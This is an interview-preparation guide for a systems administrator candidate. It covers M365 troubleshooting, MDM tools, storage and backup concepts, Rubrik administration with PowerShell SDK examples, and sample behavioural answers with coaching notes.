My M365 experience is at the support and user administration level rather than deep Exchange or compliance admin. I've handled user mailbox creation and offboarding, shared mailbox setup, license assignment and reclamation, and distribution group management. I've done password resets and MFA troubleshooting through the Entra ID admin center, and I've worked with mailbox permissions to grant access to shared mailboxes. For the deeper Exchange administration — mail flow rules, connectors, transport rules — I have working familiarity but not deep hands-on. I learn it quickly when I need to use it.
Short and honest. Don't claim deep Exchange admin — you don't have it. This answer is defensible and sets honest expectations.
A user says they're not receiving email — how do you troubleshoot?
Start in the Exchange Admin Center with Message Trace — search by recipient address and time window to see what's happening to the mail: delivered, quarantined, failed, or redirected. If it shows delivered, the problem is likely client-side — Outlook sync, profile corruption, or a local rule filtering messages. If quarantined, check the spam/anti-phishing policy. If failed, look at the rejection reason — could be a domain issue, quota exceeded, or mail flow rule blocking it. Also check if the mailbox is over quota — that'll reject inbound mail and the user won't know it.
What's the difference between a shared mailbox and a distribution group?
A shared mailbox is an actual mailbox — it receives, stores, and sends email. Multiple users can have access to it with Full Access and Send As permissions. It has storage, calendar, contacts. A distribution group is just a routing list — you send to the group, it fans out to everyone in it. No storage, no calendar. If the use case is "a team needs to see and respond to the same emails" — shared mailbox. If the use case is "send a company announcement to everyone in IT" — distribution group.
⚠️ No direct Intune or JAMF. Bridge via BigFix + Horizon DEM. Honest, defensible answers.

MDM Concept Comparison

ToolPlatformKey CapabilitiesYour Level
IntuneWindows, Mac, iOS, AndroidEnrollment, compliance policies, app deployment, BitLocker, Conditional Access integrationLimited — bridge via BigFix
JAMF ProMac / Apple ecosystemMac DEP/ADE enrollment, profiles, scripts, app catalog, OS updates, inventoryNone — bridge via BigFix concepts
BigFixWindows, Linux, Mac, AIXPatch mgmt, software deployment, compliance reporting, custom fixletsReal — Disney + CMS
Horizon DEMWindows VDIProfile management, app config, folder redirectionReal — CMS 2,000+ users

Honest Bridge Answers

What's your Intune or JAMF experience?
I haven't used Intune or JAMF directly, but I've managed enterprise endpoint management at scale with equivalent tools. At Disney I used IBM BigFix for patch deployment and policy compliance across 80+ Linux servers — the same workflow as Intune or JAMF: enrollment, policy push, compliance reporting, patch automation. At CMS I managed VMware Horizon DEM for 2,000+ VDI users — profile policies, app controls, folder redirection — conceptually the same as Intune managing a managed Windows device. The underlying logic transfers. I'd expect a learning curve on the specific consoles, not on the concepts.
If we gave you a JAMF console tomorrow, how would you approach it?
Orient first — understand what's enrolled, what policies are active, what the current baseline looks like before touching anything. Then JAMF's documentation and Jamf Nation community resources are excellent. Within a week I'd be handling day-to-day Mac management tasks. I already understand the concepts: enrollment profiles, configuration profiles, scripts, patch management — the JAMF-specific implementation is what I'd learn on the job.
⚠️ No direct Rubrik. Bridge: Dell CloudSnapshot Manager (AWS) + Azure Backup + EMC Isilon. Strong domain knowledge — new tool only.

Storage Types — Complete Reference

TypeProtocolAccess ModelUse CaseYour Experience
DASSATA, SAS, NVMeBlock — single serverOS drives, local DBsServer disks generally
NASNFS (Linux), SMB (Windows)File — shared over networkFile shares, home dirs, VMware NFS datastores✅ EMC Isilon — 3 clusters Disney
SANFibre Channel, iSCSIBlock — presented as local diskVMware VMFS datastores, databasesiSCSI experience
Object StorageHTTP/S REST APIObject — flat, metadata-richBackups, archives, logs at scale✅ AWS S3, Azure Blob at CMS
vSANVMware proprietaryBlock distributed across ESXi hostsHCI — no external storageConceptual
💡 EMC Isilon = scale-out NAS. Adds nodes horizontally. NFS and SMB exports. Media, large unstructured data. Your 3 Disney clusters fed VMware NFS datastores.

Backup Types — Full Reference

TypeCapturesBackup SpeedRestore SpeedStorageNotes
FullEverything, every timeSlowestFastest — one setMostFoundation of any backup strategy. Required to start any chain.
IncrementalChanged since LAST backup (any type)FastestSlowest — need full + all incrementalsLeastLong restore chain = restore risk. Rubrik avoids this with incremental-forever + synthetic full.
DifferentialChanged since last FULLMedium (grows daily)Fast — full + 1 diffMedium (grows until next full)Simpler restore than incremental. Grows large before the next full.
SnapshotPoint-in-time storage state (delta)Near-instantNear-instantGrows as changes accumulateNOT a backup — same storage system. Safety net for changes. Rubrik captures snapshots then moves data off to its own storage.
CDPEvery write in real timeAlways runningAny point in timeHighNear-zero RPO. Used for critical DBs. High overhead.
Synthetic FullConstructs full from existing chain without reading sourceServer-side processFastest — treated as fullEfficientRubrik's secret weapon. All recovery points look like fulls. No weekly full backup window needed.
Mirror/CloneExact copy of data, updated continuouslyContinuousInstant — already a full copy2xRAID-1 or replication. Not backup by itself — doesn't protect against logical corruption or ransomware.

Application-Consistent vs Crash-Consistent

Application-Consistent ✅ Preferred

  • App notified before snapshot — flushes writes to disk, quiesces I/O
  • Windows: VSS (Volume Shadow Copy Service)
  • Linux: pre/post freeze scripts or agent
  • Result: Clean, guaranteed consistent restore. Like a proper shutdown.
  • Rubrik and Azure Backup use this by default

Crash-Consistent ⚠️

  • Snapshot without notifying the app — whatever's on disk in that instant
  • Like pulling the power cord — in-flight writes may be lost
  • Usually OK for OS — Windows/Linux can recover (chkdsk/fsck)
  • Risky for databases — may need transaction log replay
  • Happens when VMware Tools/agent not installed or VSS fails

Key Backup Strategy Concepts

RPO (Recovery Point Objective) — max data loss acceptable. "4-hour backup = 4-hour max RPO." Drives frequency.
RTO (Recovery Time Objective) — how fast must systems be back. Drives method — instant mount vs full restore.
3-2-1 Rule — 3 copies, 2 media types, 1 off-site. Rubrik on-prem + cloud archive = 3-2-1.
GFS (Grandfather-Father-Son) — tiered retention: daily 30d, weekly 12wk, monthly 12mo, yearly Ny. Rubrik SLA enforces automatically.
Immutable Backup — WORM — cannot be modified or deleted for a defined period. Critical for ransomware protection. Rubrik air-gaps backups by default.
Air Gap — backup completely isolated from production network. Rubrik cloud archive in a separate account/tenant = logical air gap.

Dell CloudSnapshot Manager — Your Real Experience

✅ This is your Rubrik bridge. Same concepts, different platform.

What You Did with Dell CSM

  • AWS Tagging — tagged EC2 instances and EBS volumes so CSM could identify what to protect. Tags drove which policy applied to which resource. Same concept as Rubrik SLA tag assignment.
  • Backup Policies — configured frequency (hourly/every 4h/daily) and retention (how many snapshots to keep, how long). CSM enforced these automatically without manual job scheduling.
  • Snapshot Lifecycle — CSM created EBS snapshots on schedule and automatically expired old ones per retention settings. Hands-off once configured.
  • Cross-Region Copy — copied snapshots to a secondary AWS region for DR. Same as Rubrik replicating to a secondary cluster or archiving to cloud.
  • Recovery — restored EC2 instances or individual EBS volumes from specific recovery points.

Dell CSM → Rubrik Mapping

Dell CloudSnapshot ManagerRubrik Equivalent
Tag-based policy assignmentSLA Domain assigned to objects (VMs, filesets, DBs)
Backup policy (frequency + retention)SLA Policy (frequency, retention tiers, archival rules)
EBS SnapshotRubrik incremental-forever snapshot (stored in Rubrik cluster)
Cross-region snapshot copyRubrik replication to secondary cluster OR cloud archive to Azure/S3
Restore from snapshotInstant recovery / live mount or full restore from RSC
CSM web UIRubrik Security Cloud (RSC) — centralized SaaS console

Rubrik — Complete Platform Deep Dive

Architecture

Rubrik Cluster (On-Prem)Physical or virtual appliance running Rubrik software. Stores backup data locally. Single or multi-node for scale/HA. Connects to vCenter, AD, NAS, physical agents.
Rubrik Security Cloud (RSC)SaaS browser-based management console. Single pane for all Rubrik clusters, cloud workloads, SaaS protection. Create SLA policies, monitor jobs, trigger restores, view threats.
SLA Domain (Policy)Core object in Rubrik. Defines: backup frequency, local retention, replication target, cloud archive tier and retention. Assign to any workload — Rubrik enforces it automatically.
Cloud ArchiveOld backup data tiered to Azure Blob, AWS S3, or GCS per SLA policy. Cheaper long-term retention. Rubrik manages the lifecycle — you don't touch it manually.

How Rubrik Handles Each Backup Type

ScenarioBackup Type UsedHow Rubrik Does It
First ever backup of a workloadFullReads all data and ingests to the Rubrik cluster. Foundation of the protection chain.
All subsequent scheduled backupsIncremental-foreverOnly changed blocks since last backup transferred. No periodic full needed. Dedup + compression applied at ingest.
Every recovery point appears as a fullSynthetic Full (virtual)Rubrik constructs a full image on demand from the chain. No source re-read. Every restore point is instantly accessible as if it were a full backup.
Fast recovery — Live MountSnapshot (in-place)Rubrik presents the backup data directly to vCenter as a live datastore. VM boots in seconds. Background restore runs. When done, VM is migrated back transparently. Cuts RTO from hours to minutes.
File-level recoveryObject restore from snapshotBrowse backup contents like a file explorer. Select individual file(s) and restore to original or alternate location. No full VM restore needed.
Long-term archive retrievalObject restore from cold storageRehydrate from Azure Blob Archive or S3 Glacier. May take hours depending on tier. Plan this for DR scenarios, not daily operations.
Ransomware recoveryImmutable snapshotBackups stored with immutability — even Rubrik admins can't delete them during the retention window. Find last clean recovery point before infection. Instant mount to validate, then restore.

Key Rubrik Features

  • Deduplication & Compression — identical blocks across VMs stored once. Compression reduces further. Typical 40–60% storage savings vs raw data.
  • VMware Integration — uses VMware VADP (vStorage APIs for Data Protection) to take application-consistent quiesced snapshots of VMs without installing agents inside the VM.
  • Physical & Agent-based — for physical servers and databases (SQL, Oracle), Rubrik installs an agent inside the OS. The agent coordinates VSS/quiescing and sends data to the Rubrik cluster.
  • Ransomware Threat Hunting — Rubrik scans backup data for indicators of ransomware and flags suspicious activity. Helps identify which snapshots are clean vs infected.
  • API-First — everything in RSC is accessible via REST API or the Rubrik PowerShell SDK. Automate snapshot triggers, reporting, restores.

Rubrik PowerShell SDK — Key Commands

# Install and connect Install-Module Rubrik Connect-Rubrik -Server rubrik.company.local -Credential (Get-Credential) # Get VM protection status Get-RubrikVM -Name "WebServer01" Get-RubrikVM | Where {$_.effectiveSlaDomainName -eq "Unprotected"} # find unprotected VMs # Take on-demand snapshot New-RubrikSnapshot -id (Get-RubrikVM -Name "WebServer01").id # List recovery points Get-RubrikSnapshot -VM "WebServer01" | Select date,cloudState,slaName | Sort date -Desc # Restore VM Restore-RubrikVM -id (Get-RubrikSnapshot -VM "WebServer01" | Sort date -Desc | Select -First 1).id # Assign SLA policy Get-RubrikVM -Name "WebServer01" | Protect-RubrikVM -SLA "Gold"

Interview Q&A — Storage & Backups

Have you worked with Rubrik?
Not with Rubrik directly, but I've worked at the same conceptual level with equivalent tools. I used Dell CloudSnapshot Manager in AWS — tag-based policy assignment, configuring backup frequency and retention, managing snapshot lifecycle and cross-region copies for DR. At CMS I configured Azure Backup with Recovery Services Vaults, tiered retention policies, and recovery testing. At Disney I administered three EMC Isilon NAS clusters. Rubrik is the same domain — policy-driven backup, SLA enforcement, instant recovery, cloud archival. I'd get up to speed on the RSC console and SDK quickly.
How would you design a backup policy for a mixed environment?
Categorize workloads by criticality first. Tier 1 — production, critical databases: daily backups, 30-day local retention, weekly retained 3 months, monthly 1 year. Application-consistent. RPO of 4 hours or less, RTO in under an hour using live mount. Tier 2 — important but not mission-critical: daily, 14-day retention. Tier 3 — dev/test: weekly only, 30 days. Layer in cloud archival for anything needing long-term retention at lower cost. And validate recovery — quarterly restore drills to confirm backups are actually usable before an incident makes it urgent. That's the piece people skip and then regret.
What's the difference between a snapshot and a backup?
A snapshot is a point-in-time copy on the same storage system — fast, useful as a safety net before a change, but doesn't protect against storage failure or ransomware that hits the same system. A backup is an independent copy stored separately — designed for disaster recovery, hardware failure, or ransomware. Rubrik bridges this elegantly: it takes a snapshot of a VM, then immediately moves that data to its own protected, immutable storage. You get the speed of a snapshot with the protection of a true backup, stored off the production system.

Tell Me About Yourself — Framework

Tell me about yourself.
I'm a bilingual systems administrator with 10+ years of enterprise IT experience. I spent 8 years at The Walt Disney Company managing multi-site hybrid infrastructure — VMware, Linux servers, storage, networking, and 24/7 media operations across three data centers. From there I went into a federal healthcare IT contract supporting Centers for Medicare and Medicaid Services — CMS — focused on Azure, Active Directory, VMware Horizon VDI, and PowerShell automation. I recently relocated to Houston and I'm looking for a stable operational role where I can contribute from day one. Hybrid infrastructure — cloud and on-prem together — is exactly where I operate.

Situational / Behavioral Questions

Tell me about a time something broke in production and how you handled it.
At Disney we had a VMware host fail during a live broadcast window — multiple VMs hosting our streaming TV stations went down. HA kicked in and restarted most VMs within a few minutes, but two didn't restart cleanly because of resource contention on the remaining hosts. I immediately vMotioned lower-priority VMs to free up capacity, then manually triggered the restarts on the critical broadcast VMs. We were back live within 8 minutes. After stabilizing, I did a root cause analysis — the host had been showing disk latency warnings in vCenter for two days that nobody acted on. From that I pushed for alert thresholds to be wired to an action group so the team would be paged immediately rather than relying on someone checking dashboards.
How do you prioritize when multiple issues come in at once?
Impact and scope first — how many users affected and how critically. Something down for one user is a P3. Something down for a whole department is a P1 regardless of who submitted the ticket. I triage quickly, communicate to affected users so they know it's being worked, and escalate proactively if the issue is beyond my immediate resolution. Documentation happens in parallel — I write notes as I work so if I have to hand off, the next person isn't starting from zero.
Why do you want this role / why Heath Consultants?
I'm looking for a stable operational role in a real infrastructure environment — cloud and on-prem together — where I can do the work without a lot of bureaucracy. Heath's focus on utility and field operations infrastructure is interesting to me — it's practical, mission-critical work. I'm local, I'm available immediately, and I want to plant roots in Houston rather than job-hop. This fits both what I'm good at and what I'm looking for.
What's a technology you taught yourself recently?
I've been building bash and Python scripts for personal automation projects — including a weather monitoring script that watches multiple cities via API and sends Telegram alerts for rain and flood warnings. It's running on a Linux server continuously. I also started studying Security+ — which has pushed me to formalize a lot of the security concepts I've been applying by instinct into proper frameworks. Learning by building something real is how I retain it best.
This is genuine — your rain_alert.sh is a real project. Own it.

Questions to Ask Them

Pick 2–3. Show curiosity, not neediness.

  • What does the current IT infrastructure look like — ratio of cloud to on-prem?
  • Is this a solo IT role or part of a team? Who would I work most closely with day to day?
  • What's the biggest infrastructure challenge you'd want this person to help solve in the first 90 days?
  • What does success look like at 6 months?
  • What's the on-call or after-hours expectation, if any?
  • How is the IT team structured — are there separate teams for cloud, infrastructure, helpdesk?
  • What tools are you currently using for monitoring and backup? (Opens Rubrik conversation naturally.)
Optional power close: "Is there anything about my background that gives you pause? I'd rather address it directly." — Bold. Memorable. Shows confidence.

Interview Tone Reminders

  • 3–5 sentences per answer, then stop. Let them probe. Don't fill silence with rambling.
  • Gaps (JAMF, Rubrik, Intune, deep M365): bridge honestly, move on. No apologizing.
  • ~1yr Azure/VMware gap: "I've been refreshing the details — the hands-on foundation is there." Then answer the question.
  • Smile. Video calls are cold. Warmth is memorable.
  • Pause before answering complex questions. "Let me think about that for a second" is a sign of a professional, not weakness.
  • Bilingual is a bonus. Utility industry often has bilingual field crews — mention it if there's an opening.